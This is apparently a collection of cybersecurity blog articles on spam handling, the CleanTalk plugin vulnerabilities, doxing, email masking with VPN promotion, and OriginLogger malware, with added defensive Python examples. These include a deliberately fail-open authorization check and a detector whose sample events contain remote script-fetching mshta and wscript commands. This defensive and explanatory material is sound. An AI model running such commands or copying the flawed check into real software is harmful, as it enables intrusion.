
Why You Shouldn’t Delete Spam Emails Right Away

Unwanted emails, commonly known as spam, fill up inboxes daily. Many people delete them without a second thought, assuming it’s the best way to get rid of them. However, cybersecurity experts advise against this. Instead of deleting spam messages immediately, marking them as junk can improve your email provider’s ability to filter them out in the future.  


The Importance of Marking Emails as Spam  

Most email services, such as Gmail, Outlook, and Yahoo, use automatic spam filters to separate important emails from unwanted ones. These filters rely on user feedback to improve their accuracy. If you simply delete spam emails without marking them as junk, the system does not learn from them and may not filter similar messages in the future.  

Here’s how you can help improve your email’s spam filter:  

• If you use an email app (like Outlook or Thunderbird): Manually mark unwanted messages as spam if they appear in your inbox. This teaches the software to recognize similar messages and block them.  

• If you check your email in a web browser: If a spam message ends up in your inbox instead of the spam folder, select it and move it to the junk folder. This helps train the system to detect similar threats.  

By following these steps, you not only reduce spam in your inbox but also contribute to improving the filtering system for other users.  
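To show what "teaching" a filter means in practice, here is an added Python example (not code from the post or from any mail provider): a small naive Bayes classifier in which the mark-as-spam action feeds the message's words back into the model, so that a similar message which slipped through before is caught afterwards. The training messages and the phishing-style test message are constructed sample data, and the class and function names are this example's own.

```python
import math
import re
from collections import Counter

# Constructed training messages (sample data for this example, not from the post).
TRAINING = [
    ("Congratulations you won a free prize, click here to claim now", "spam"),
    ("Limited offer: cheap pills, claim your free discount today", "spam"),
    ("Meeting moved to 3pm, see the agenda attached", "ham"),
    ("Can you review the quarterly report before Friday", "ham"),
]


def tokenize(text):
    """Lower-case word tokens; digits and punctuation are dropped."""
    return re.findall(r"[a-z']+", text.lower())


class FeedbackSpamFilter:
    """Multinomial naive Bayes classifier with Laplace smoothing.

    mark_spam()/mark_ham() play the role of the 'report as junk' / 'not junk'
    buttons: they add the message's words to the per-class counts, so the
    next similar message scores differently.
    """

    def __init__(self):
        self.word_counts = {"spam": Counter(), "ham": Counter()}
        self.doc_counts = {"spam": 0, "ham": 0}

    def train(self, text, label):
        self.doc_counts[label] += 1
        self.word_counts[label].update(tokenize(text))

    def mark_spam(self, text):
        self.train(text, "spam")

    def mark_ham(self, text):
        self.train(text, "ham")

    def spam_probability(self, text):
        """P(spam | words), computed from summed log-likelihood ratios."""
        vocab = set(self.word_counts["spam"]) | set(self.word_counts["ham"])
        totals = {c: sum(self.word_counts[c].values()) for c in ("spam", "ham")}
        # Class prior, smoothed so an empty class never yields log(0).
        log_odds = math.log((self.doc_counts["spam"] + 1) / (self.doc_counts["ham"] + 1))
        for tok in tokenize(text):
            # +1 on the count and |V|+1 on the denominator: a word never seen
            # in a class still gets a small non-zero probability there.
            p_spam = (self.word_counts["spam"][tok] + 1) / (totals["spam"] + len(vocab) + 1)
            p_ham = (self.word_counts["ham"][tok] + 1) / (totals["ham"] + len(vocab) + 1)
            log_odds += math.log(p_spam / p_ham)
        return 1.0 / (1.0 + math.exp(-log_odds))

    def is_spam(self, text, threshold=0.5):
        return self.spam_probability(text) > threshold


def demonstrate_feedback():
    """Score a phishing-style message before and after one 'mark as spam' click.

    Returns (probability_before, probability_after).
    """
    f = FeedbackSpamFilter()
    for text, label in TRAINING:
        f.train(text, label)
    new_message = "Please verify the password for the account before it is closed"
    before = f.spam_probability(new_message)
    # The user reports a similar message as junk instead of deleting it.
    f.mark_spam("Please verify your password for the account before it is closed permanently")
    after = f.spam_probability(new_message)
    return before, after


if __name__ == "__main__":
    before, after = demonstrate_feedback()
    print(f"before feedback: {before:.3f}  after feedback: {after:.3f}")
```

Deleting the message would leave the counts untouched and the second, nearly identical message would score just as low as the first; the single report is what moves it across the threshold.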


Why You Should Never Click "Unsubscribe" on Suspicious Emails  

Many spam emails include an option to "unsubscribe," which might seem like an easy way to stop receiving them. However, clicking this button can be risky.  

Cybercriminals send millions of emails to random addresses, hoping to find active users. When you click "unsubscribe," you confirm that your email address is valid and actively monitored. Instead of stopping, spammers may send you even more unwanted emails. In some cases, clicking the link can also direct you to malicious websites or even install harmful software on your device.  

To stay safe, avoid clicking "unsubscribe" on emails from unknown sources. Instead, mark them as spam and move them to the junk folder.  


Simple Ways to Protect Yourself from Spam  

Spam emails are not just a nuisance; they can also be dangerous. Some contain links to fake websites, tricking people into revealing personal information. Others may carry harmful attachments that install malware on your device. To protect yourself, follow these simple steps:  

1. Stay Alert: If an email seems suspicious or asks for personal information, be cautious. Legitimate companies do not ask for sensitive details through email.  

2. Avoid Acting in a Hurry: Scammers often create a sense of urgency, pressuring you to act quickly. If an email claims you must take immediate action, think twice before responding.  

3. Do Not Click on Unknown Links: If an email contains a link, avoid clicking it. Instead, visit the official website by typing the web address into your browser.  

4. Avoid Opening Attachments from Unknown Senders: Malware can be hidden in email attachments, including PDFs, Word documents, and ZIP files. Open attachments only if you trust the sender.  

5. Use Security Software: Install antivirus and anti-spam software to help detect and block harmful emails before they reach your inbox.  


Spam emails may seem harmless, but how you handle them can affect your online security. Instead of deleting them right away, marking them as spam helps email providers refine their filters and block similar messages in the future. Additionally, never click "unsubscribe" in suspicious emails, as it can lead to more spam or even security threats. By following simple email safety habits, you can reduce risks and keep your inbox secure.

Critical Vulnerabilities in CleanTalk WordPress Plugin Put 200,000 Websites at Risk

Defiant has raised alarms about two significant vulnerabilities affecting CleanTalk’s anti-spam WordPress plugin, which could enable attackers to execute arbitrary code remotely without authentication. The vulnerabilities, tracked as CVE-2024-10542 and CVE-2024-10781, carry a CVSS score of 9.8. They affect the “Spam protection, Anti-Spam, FireWall by CleanTalk” plugin, which has over 200,000 active installations on WordPress sites globally.

The flaws pose a significant risk by allowing remote attackers to install and activate arbitrary plugins, including potentially vulnerable ones that can then be exploited for remote code execution (RCE). According to Defiant, the first vulnerability, CVE-2024-10542, involves an authorization bypass issue. This weakness exists in a function responsible for handling remote calls and plugin installations, where token-based authorization is used to secure these actions. 

However, two related functions intended to verify the originating IP address and domain name are vulnerable to exploitation. Attackers can manipulate these checks through IP and DNS spoofing, enabling them to specify an IP address or subdomain under their control. This bypasses the plugin’s authorization process, allowing the attacker to carry out actions such as installing, activating, deactivating, or uninstalling plugins without proper permissions. The vulnerability was discovered in late October and was addressed with the release of version 6.44 of the plugin on November 1. 

However, this update inadvertently introduced another vulnerability, CVE-2024-10781, which provided attackers with an alternative method of bypassing token authorization. CVE-2024-10781 arises from a flaw in how the plugin processes tokens for authorization. Specifically, if a website has not configured an API key in the plugin, attackers can use a token that matches an empty hash value to authenticate themselves. This effectively nullifies the intended security measures and allows attackers to install and activate arbitrary plugins, which can then be exploited for malicious purposes, such as executing remote code. 

The CleanTalk development team addressed this second vulnerability with the release of version 6.45 on November 14, which contains fixes for both CVE-2024-10542 and CVE-2024-10781. Despite the availability of this updated version, data from WordPress indicates that as of November 26, approximately half of the plugin’s active installations are still running outdated and vulnerable versions. This exposes a significant number of websites to potential exploitation. The risks associated with these vulnerabilities are considerable, as attackers could gain complete control over affected websites by leveraging these flaws. This includes the ability to install additional plugins, some of which may themselves contain vulnerabilities that could be exploited for further malicious activities. 

Website administrators using the CleanTalk anti-spam plugin are strongly urged to update to version 6.45 or later as soon as possible. Keeping plugins up to date is a critical step in maintaining the security of WordPress websites. By applying the latest updates, administrators can protect their sites against known vulnerabilities and reduce the risk of being targeted by cyberattacks. In addition to updating plugins, security experts recommend implementing additional security measures, such as monitoring for unauthorized changes, using a robust firewall, and conducting regular security audits. 
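The two flaws described above and the update advice, demonstrated in an added Python example that is not CleanTalk's code: a token check that fails open when no API key is configured (the CVE-2024-10781 pattern) beside one that fails closed and compares in constant time, plus a version check an administrator can run against a plugin file header to see whether the installed version is 6.45 or later. The hash algorithm, function names, and header-parsing helper are assumptions for illustration; the real plugin is PHP and the page does not describe its token scheme.

```python
import hashlib
import hmac
from typing import Optional


# Illustrative token derivation. The page does not say which hash the plugin
# uses, so SHA-256 is an assumption, not CleanTalk's actual scheme.
def derive_token(api_key: str) -> str:
    return hashlib.sha256(api_key.encode("utf-8")).hexdigest()


def authorize_vulnerable(supplied_token: str, configured_api_key: Optional[str]) -> bool:
    """Fails open: an unset key is treated as the empty string, so whoever
    presents derive_token("") is authorised on every site without a key."""
    key = configured_api_key or ""
    return supplied_token == derive_token(key)


def authorize_fixed(supplied_token: str, configured_api_key: Optional[str]) -> bool:
    """Fails closed: with no configured key no remote action is ever
    authorised, and the comparison does not leak timing."""
    if not configured_api_key or not supplied_token:
        return False
    expected = derive_token(configured_api_key)
    return hmac.compare_digest(supplied_token.encode("utf-8"), expected.encode("utf-8"))


def parse_version(version: str) -> tuple:
    """'6.45' -> (6, 45); non-numeric parts count as 0."""
    parts = []
    for piece in version.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


# Version that fixes both CVEs, as stated in the article.
FIXED_VERSION = (6, 45)


def is_patched(installed_version: str) -> bool:
    """True if the installed plugin version is 6.45 or later."""
    return parse_version(installed_version) >= FIXED_VERSION


def audit_plugin_header(header_text: str) -> Optional[bool]:
    """Read the 'Version:' line of a WordPress plugin file header and report
    whether it is patched; None if no version line is present."""
    for line in header_text.splitlines():
        stripped = line.strip(" *\t")
        if stripped.lower().startswith("version:"):
            return is_patched(stripped.split(":", 1)[1])
    return None


if __name__ == "__main__":
    empty = derive_token("")
    print("vulnerable check, no key configured:", authorize_vulnerable(empty, None))
    print("fixed check, no key configured:     ", authorize_fixed(empty, None))
    print("6.44 patched?", is_patched("6.44"), " 6.45 patched?", is_patched("6.45"))
```

The hardened check refuses every request until an API key exists rather than deriving a token from an empty secret; the version helper reads the same `Version:` header line WordPress itself uses to display the installed plugin version.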

These practices can help ensure that websites remain secure against evolving threats. By addressing these vulnerabilities and staying proactive about updates, WordPress site owners can safeguard their online presence and protect the sensitive data entrusted to their platforms.

Doxing: Is Your Personal Information at Risk?

Doxing is online slang for "dropping documents": revealing private information about a person, or their identity, to the public without their permission. It may be as simple as a name, email address, or phone number, but it can also include confidential data such as financial information, home addresses, and even personal photos. Hackers and cybercriminals typically do this to harm the target, whether through identity theft, fraud, or embarrassment.

The methods vary: some attackers harvest personal information from social media platforms or public databases, while others use phishing to extract sensitive details from unsuspecting individuals. Once the information is out, it is no longer within the victim's control, and the impact can be dire, reaching every part of their life.


Impact of Doxing on Victims

Once private information is made public, victims can easily be subjected to harassment, identity theft, and other forms of exploitation. In many cases it feels like a violation of privacy, evoking feelings of vulnerability and betrayal. Even if the person responsible is unknown to the victim, they may feel as if they are in constant danger.

The extent of the damage also depends on the type of information leaked. If financial details are exposed, victims can lose money to fraud and theft. Leaked sensitive photos or private details can damage reputations, harm relationships, or even cost someone their job. In extreme cases, sensitive data such as online search histories can lead to even worse consequences: public humiliation.


Why You Shouldn't Leak Your Email Address

You might think that nothing much can be done with your email address, but believe me, a fair amount of valuable information is attached to it. Sure, you share it with friends, family, or perhaps a business that runs a loyalty programme or emails you receipts. But would you want everyone in the world to have it? I didn't think so. Once your address is out there, cyber thieves have an open opportunity to flood your inbox with spam, phishing attempts, or malware disguised as legitimate messages. If you click on any of those links, your device may be compromised.

Beyond spam, hackers can use your email address to create accounts in your name, damaging your online reputation. Even the smallest piece of personal information can be dangerous once someone gains access to it and uses it maliciously.


Real-Life Examples of Doxing's Impact

The outcomes of doxing, in some well-publicised instances, have been catastrophic. Claira Janover posted a satirical video that spread across the internet and led to death threats, including the publication of her home address; she was forced to move. Deloitte, the firm that had already hired her, rescinded its job offer because of the online activity associated with her professional profile.

Another example is the 2013 Boston Marathon bombing investigation, in which online communities on Reddit and 4Chan wrongly accused innocent people. The families of those misidentified had to endure seeing their loved ones' names spread online as falsely linked to the attack. These cases show that doxing is not only a privacy violation but can also have life-altering results.


How to Protect Yourself from Doxing

Anyone can be doxed, but there is a lot you can do to avoid becoming a victim. The first and most important step is practising good cyber hygiene: lock the doors, so to speak. Keep your social media accounts private and be selective about who can follow or connect with you online. Regularly review your privacy settings and make sure that sensitive information about you is not publicly visible.

You can go further by masking your IP address with a VPN (Virtual Private Network) and by using separate email accounts for personal communication, shopping, and professional work. Never click a suspicious link, even if it looks legitimate: doing so can harm you at any time.

Doxing is a serious form of cybercrime with deep and far-reaching effects on a victim's personal and professional life. The important thing to understand is that being aware of the danger and taking proactive steps to protect your information goes a long way toward reducing the chance of such an attack. Protecting your digital privacy is a necessity today.


Why You Should Mask Your Email Address

In today's digital age, entering your real email address into a website is a risky move. It's all too common for websites to sell your information to data brokers, who then use it for marketing, targeted ads, or even reselling. To safeguard your privacy and security, masking your email address has become a crucial practice.

Email masking is essential not just for avoiding spam but also for protecting your personal information from falling into the wrong hands. If your email address is leaked in a data breach, it could end up on the dark web, accessible to scammers and cybercriminals. These malicious actors store your data in databases for use in scams and hacking attempts. Additionally, there have been instances where government bodies have purchased data broker information for surveillance purposes.

By using masked emails when signing up for services and accounts, you can prevent your details from being leaked. A masked email can be discarded with a single click, rendering it useless to scammers. This proactive measure significantly reduces your risk of being targeted by cyber threats.

Easy Solutions for Email Masking

For those looking to enhance their privacy effortlessly, two services stand out: NordVPN and Surfshark. These VPN providers offer more than just secure internet connections; they also provide simple and effective email masking solutions.

NordVPN integrates email masking with its built-in password manager, NordPass. This service is user-friendly, offering fast speeds and excellent content unblocking capabilities. Priced at $3.39 per month for a two-year plan, NordVPN delivers great value and a range of privacy tools. Plus, it comes with a 30-day money-back guarantee, allowing you to try it risk-free.

Surfshark is another excellent choice, especially for those on a budget. It not only masks your email but also offers phone number masking for users in the US, with plans to expand this feature to other regions. Known for its speed and effectiveness in streaming, Surfshark provides a high-quality VPN service with a 30-day money-back guarantee. This allows you to test the service before committing.

Using a VPN like NordVPN or Surfshark offers several other benefits. These services protect your devices from hackers, enable you to stream content from abroad, and block ads and malware. The comprehensive protection offered by VPNs makes them a valuable tool for maintaining online privacy and security.


Taking Privacy Further with Incogni

For those looking to take their privacy a step further, Incogni is a useful tool. It actively removes your information from data brokers, reducing the chances of being targeted by aggressive marketing and advertisers. Bundling Incogni with a Surfshark subscription can be a cost-effective way to enhance your privacy defences.

Keeping your email address private is a simple yet powerful way to protect yourself from unwanted spam and cyber threats. By utilising services like NordVPN and Surfshark for email masking, and tools like Incogni for data removal, you can enjoy a more secure and private online experience.


Rising Email Security Threats: Here’s All You Need to Know

A recent study highlights the heightened threat posed by spam and phishing emails due to the proliferation of generative artificial intelligence (AI) tools such as ChatGPT and the growing popularity of cloud services.

According to a fresh report from VIPRE Security Group, the surge in cloud usage has correlated with an uptick in hacker activity. In this quarter, 58% of malicious emails were found to be delivering malware through links, while the remaining 42% relied on attachments.

Furthermore, cloud storage services have emerged as a prominent method for delivering malicious spam (malspam), accounting for 67% of such delivery in the quarter, as per VIPRE's findings. The remaining 33% utilized legitimate yet manipulated websites.

The integration of generative AI tools has made it significantly harder to detect spam and phishing emails. Traditionally, grammatical errors, misspellings, or unusual formatting were red flags that tipped off potential victims to the phishing attempt, enabling them to avoid downloading attachments or clicking on links.

However, with the advent of AI tools like ChatGPT, hackers can now craft well-structured, linguistically sophisticated messages that are virtually indistinguishable from benign correspondence. Recipients therefore need to take additional precautions to counter the threat.

In the third quarter of this year alone, VIPRE's tools identified a staggering 233.9 million malicious emails. Among these, 110 million contained malicious content, while 118 million carried malicious attachments. Moreover, 150,000 emails displayed "previously unknown behaviors," indicating that hackers are continually refining their techniques.

Phishing and spam persist as favored attack methods in the arsenal of every hacker. They are cost-effective to produce and deploy, and with a stroke of luck, can reach a wide audience of potential victims. Companies are advised to educate their staff about the risks associated with phishing and to meticulously scrutinize every incoming email, regardless of the sender's apparent legitimacy.

Christmas Eve Hack Targets Arnold Clark

Hackers launched a notorious Christmas Eve cyberattack against the car dealership Arnold Clark. The resulting network issue, which affected computer and telephone services, forced the company to reschedule customers who had maintenance and repair appointments this week.

Uncertainty surrounds the timing of the issue, as the company operates two dealerships in the town, both on Annan Road. The incident is one more indication of how susceptible businesses are to online crime, especially over the holidays, when many firms are less watchful of security precautions than they typically would be.

The company's IT security staff confirmed that the system fault first surfaced on Christmas Eve and that, so far, there is no evidence of customer data being compromised.

On Wednesday, an official told the newspaper: "Over the Christmas holiday, we experienced a network issue that had an impact on both our computer and phone systems. Through their investigations so far, our IT security team has verified that there is no proof that any customer data has been hacked. We want to take this chance to express our gratitude to our clients for their understanding and our regret for any trouble this may have caused."

The origin of the attack remains unknown, but several causes are possible. An employee may have unintentionally clicked a harmful link or attachment in an email, giving hackers access to the company's network. Another theory is that the attack used a zero-day exploit: a previously unknown software flaw that hackers use to enter networks before a fix is available.

Cyberattacks like the one Arnold Clark experienced can strike at any moment and cause significant harm when sufficient cybersecurity precautions are not in place. Businesses must ensure they have adequate safeguards, including multi-factor authentication and frequent system updates, and must train their personnel in fundamental cybersecurity practices such as not clicking links from unknown sources and keeping passwords secure.



Snowshoeing: How the Tactic can Spam Through Your E-mails

Cybercriminals employ a wide array of fraudulent techniques to lure users into their email traps. One of the most familiar of these scamming methods is spam email.
 
Spam emails are one of the many pitfalls facing internet users. They come in many forms and can affect a user in numerous ways, up to and including serious scams. One of the tactics spammers use is 'snowshoeing', which we discuss today. What is snowshoeing? Snowshoeing is essentially spamming on a very large scale: in a snowshoeing campaign, the spammer uses multiple IP addresses to spread spam emails across many internet domains.
 
The technique takes its name from the way snowshoes spread weight across a large surface area. A regular shoe on snow will most likely sink or slip on the ice; snowshoes are designed to spread a person's weight out more evenly.
 
Similarly, in snowshoe spamming the attacker uses multiple IP addresses rather than one, spreading the spam load across many domains. This makes snowshoe spam considerably more dangerous to its targets than many other spamming tactics.
 

What Does Snowshoe Spamming Mean? 


Snowshoe spamming is a strategy in which spam is propagated over several domains and IP addresses to weaken reputation metrics and avoid filters. The large number of IP addresses makes the spam hard to recognise and capture, so a certain amount of it reaches the destination inboxes. Specialised spam-trapping organisations are often hard-pressed to identify and trap snowshoe spam with conventional spam filters.
 
The strategy of snowshoe spamming is similar to actual snowshoes that distribute the weight of an individual over a wide area to avoid sinking into the snow. Likewise, snowshoe spamming delivers its weight over a wide area to steer clear of filters, expertly navigating them.  

 
How does Snowshoeing work? 

 
Snowshoeing differs from other unsolicited bulk mail and criminal spam in that the attacker uses several fraudulent business names and fake identities rather than just one, changing voicemail numbers and postal drops on a regular basis.
 
A reputable mailer works to earn an audience's trust and build a brand reputation by using legitimate business addresses, identifiable domains, and a small, static, easily recognised set of IP addresses, presenting the audience with a legitimate identity. Snowshoe spammers, by contrast, hide behind anonymous and unidentifiable "whois" records.
 
To spread the spam load further, snowshoe spammers frequently use large assortments of domains, which may be spread across many providers and servers.
 
Snowshoe spammers use anonymous domains, which makes it nearly impossible to track down the owner and report the spam. 
 

How to tackle Snowshoeing spam? 

 
To mitigate snowshoe spamming, administrators can apply policies hierarchically at the organisation, group, or mailbox level. Address rewriting is another option: in complex, multi-domain environments, both inbound and outbound addresses can be rewritten.
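One way to spot the pattern described in this article on the receiving side, as an added Python example that is not from the original post: group messages by a normalised subject template and flag templates that arrive from many distinct /24 networks and sender domains with only one or two messages per IP, since breadth rather than per-source volume is the snowshoe signature. The mail-log extract is constructed sample data, and the thresholds and field layout are illustrative assumptions.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed mail-log extract (sample data, not from the post). Fields are
# tab-separated: timestamp, client IP, envelope-from domain, subject.
SAMPLE_LOG = """\
2024-03-01T08:00:01\t192.0.2.10\toffer-mail-01.example\tYour exclusive offer #4821 is waiting
2024-03-01T08:00:04\t198.51.100.7\tbest-deals-02.example\tYour exclusive offer #7730 is waiting
2024-03-01T08:00:09\t203.0.113.42\tpromo-now-03.example\tYour exclusive offer #1195 is waiting
2024-03-01T08:00:15\t198.18.5.9\tsave-today-04.example\tYour exclusive offer #6402 is waiting
2024-03-01T08:00:21\t198.19.77.3\tdeal-alert-05.example\tYour exclusive offer #3358 is waiting
2024-03-01T08:00:30\t100.64.8.8\tbig-savings-06.example\tYour exclusive offer #9017 is waiting
2024-03-01T08:05:00\t192.0.2.200\tnews.example.org\tWeekly digest #12
2024-03-01T08:05:02\t192.0.2.200\tnews.example.org\tWeekly digest #12
2024-03-01T08:05:05\t192.0.2.200\tnews.example.org\tWeekly digest #12
2024-03-01T08:05:07\t192.0.2.200\tnews.example.org\tWeekly digest #12
"""


def parse_log(text):
    """Turn the tab-separated extract into a list of dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, from_domain, subject = line.split("\t", 3)
        records.append({"ts": ts, "ip": ip, "from_domain": from_domain, "subject": subject})
    return records


def normalize_subject(subject):
    """Collapse per-message variation (order numbers, case) so that one
    campaign template maps to one key."""
    return re.sub(r"\d+", "N", subject).lower().strip()


def network_of(ip, prefix=24):
    """Containing /24 of an address, e.g. 198.51.100.7 -> 198.51.100.0/24."""
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def find_snowshoe_campaigns(records, min_networks=4, max_per_ip=2):
    """Flag subject templates spread thinly across many networks and sender
    domains. A legitimate bulk sender concentrates on a few stable IPs; a
    snowshoe campaign spreads a few messages each over many of them."""
    by_template = defaultdict(list)
    for r in records:
        by_template[normalize_subject(r["subject"])].append(r)

    findings = []
    for template, recs in by_template.items():
        per_ip = Counter(r["ip"] for r in recs)
        networks = {network_of(ip) for ip in per_ip}
        domains = {r["from_domain"] for r in recs}
        if len(networks) >= min_networks and max(per_ip.values()) <= max_per_ip:
            findings.append({
                "template": template,
                "messages": len(recs),
                "distinct_ips": len(per_ip),
                "distinct_networks": len(networks),
                "distinct_domains": len(domains),
            })
    return findings


if __name__ == "__main__":
    for finding in find_snowshoe_campaigns(parse_log(SAMPLE_LOG)):
        print(finding)
```

The newsletter in the sample sends four messages from one IP and is never flagged; the offer template arrives once each from six different /24s under six throwaway domains, which is exactly the breadth a per-IP reputation system cannot see. In production the thresholds would be tuned against the organisation's own traffic, and the grouping key could combine subject template with body hash or URL host.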
 

Analysis on Agent Tesla's Successor

OriginLogger, a malware that has been hailed as the replacement for the well-known data-theft and remote access trojan (RAT) Agent Tesla, has had its workings dissected by Palo Alto Networks Unit 42.

Agent Tesla, one of the most notorious keyloggers used by hackers, was shut down on March 4, 2019, due to legal issues. It is a remote access program built on the .NET platform that has long existed in the cyber realm, enabling malicious actors to obtain remote access to target devices and transmit user data to a domain under their control. It has been publicly available since 2014 and is promoted for sale on dark web forums. Attackers typically send it as an attachment in malicious spam emails.

Since Agent Tesla and OriginLogger are both commercialized keyloggers, it should not be assumed that one has a distinct advantage over the other in terms of initial droppers. 

In February 2021, security company Sophos revealed two new versions of the malware with the ability to steal login information from web browsers, email clients, and VPN clients, as well as to use the Telegram API for command and control.

According to Unit 42 researcher Jeff White, what has been labeled as Agent Tesla version 3 is OriginLogger, which is alleged to have emerged to fill the gap left by the former after its operators shut down the business.

A YouTube video explaining its features served as the starting point for the cybersecurity company's study, which led to the detection of a malware sample, "OriginLogger.exe", that was uploaded to the VirusTotal malware archive on May 17, 2022.

The binary is a builder that enables a paying customer to specify the kind of data to be collected, including screenshots, the clipboard, and the list of services and programs from which keys are to be retrieved.

Unlike the IP addresses linked to originpro[.]me, 74.118.138[.]76 resolves to 0xfd3[.]com rather than directly to any OriginLogger domain. Looking at this domain reveals that it has MX and TXT DNS records for mail.originlogger[.]com.

Around March 7, 2022, the disputed domain started to resolve to IP 23.106.223[.]47, one octet higher than the IP used for originpro[.]me, which used 46. 

OriginLogger targets both Google Chrome and Microsoft Outlook, and Unit 42 used these two applications to locate a GitHub profile with the username 0xfd3 that hosted two source code repositories for extracting credentials from them.

Like Agent Tesla, OriginLogger is distributed via a decoy Word document that, when opened, displays an image of a German passport, a credit card, and several embedded Excel worksheets.

The files contain a VBA macro that uses MSHTA to call an HTML page on a remote server; that page contains obfuscated JavaScript that retrieves two encoded binaries stored on Bitbucket.
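A detection for the delivery chain just described, written as an added Python example rather than anything from the Unit 42 report: it scans process-creation events for an Office application spawning mshta.exe (the host named above; wscript.exe and cscript.exe are included as a generalisation of the same macro-launches-a-script-host pattern) and notes whether the command line carries a remote URL. The events are constructed samples, and the field names are assumptions modelled on Sysmon-style process telemetry rather than a specific product's schema.

```python
import re

# Office applications that should not normally launch script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# mshta.exe is the host named in the article; wscript/cscript generalise the pattern.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (sample data, not telemetry from the report).
# Field names are assumptions modelled on Sysmon-style process events.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://203.0.113.5/stage/page.html"},
    {"id": 2,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Users\alice\local_tool.hta"},
    {"id": 3,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe"},
    {"id": 4,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": "wscript.exe https://198.51.100.9/loader.js"},
]


def basename(path):
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return a reason string if the event is an Office-to-script-host launch,
    or None if it does not match the pattern."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    if REMOTE_URL.search(event["command_line"]):
        return f"{parent} spawned {child} with a remote URL"
    return f"{parent} spawned {child}"


def scan(events):
    """Return a list of (event id, reason) for every suspicious event."""
    findings = []
    for event in events:
        reason = classify_event(event)
        if reason:
            findings.append((event["id"], reason))
    return findings


if __name__ == "__main__":
    for event_id, reason in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Event 2 (mshta launched from Explorer with a local file) and event 3 (Word launching its print helper) are left alone; only the two Office-to-script-host launches with remote URLs are reported. The same parent/child logic translates directly into a Sigma or EDR rule on ParentImage and Image.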

Advertisements from the threat actors claim that the malware employs time-tested techniques and can log keystrokes, steal credentials, take screenshots, download additional payloads, exfiltrate data in a variety of ways, and attempt to evade detection.

A corpus analysis of over 1,900 samples reveals that 181 different bots were in use and that SMTP, FTP, web uploads to the OriginLogger panel, and Telegram are the most popular exfiltration methods for returning data to the attacker. The goal of the investigation was to automate the retrieval of keylogger configuration information.